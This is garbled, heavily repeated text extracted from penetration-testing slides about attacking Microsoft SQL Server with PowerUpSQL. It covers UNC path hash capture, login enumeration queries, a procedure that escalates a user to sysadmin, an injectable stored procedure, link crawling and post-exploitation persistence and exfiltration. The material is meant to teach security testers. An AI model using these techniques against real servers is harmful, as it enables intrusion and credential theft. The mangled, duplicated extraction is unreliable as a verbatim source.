Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Scalability via runspace threading Flexibility via pipeline support
ps objects and data tables Portability
o No SMO dependancieso Net Framework librarieso PowerShell v2 compliant (in theory)o Single file
Functional Goals Discover SQL Servers from different attacker perspectives Inventory SQL Servers quickly Audit SQL Servers for common insecure configurations Escalate privileges quickly on SQL Servers Support authentication using SQL Login or Windows Credential
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Scalability via runspace threading Flexibility via pipeline support
ps objects and data tables Portability
o No SMO dependancieso Net Framework librarieso PowerShell v2 compliant (in theory)o Single file
Functional Goals Discover SQL Servers from different attacker perspectives Inventory SQL Servers quickly Audit SQL Servers for common insecure configurations Escalate privileges quickly on SQL Servers Support authentication using SQL Login or Windows Credential
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Scalability via runspace threading Flexibility via pipeline support
ps objects and data tables Portability
o No SMO dependancieso Net Framework librarieso PowerShell v2 compliant (in theory)o Single file
Functional Goals Discover SQL Servers from different attacker perspectives Inventory SQL Servers quickly Audit SQL Servers for common insecure configurations Escalate privileges quickly on SQL Servers Support authentication using SQL Login or Windows Credential
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
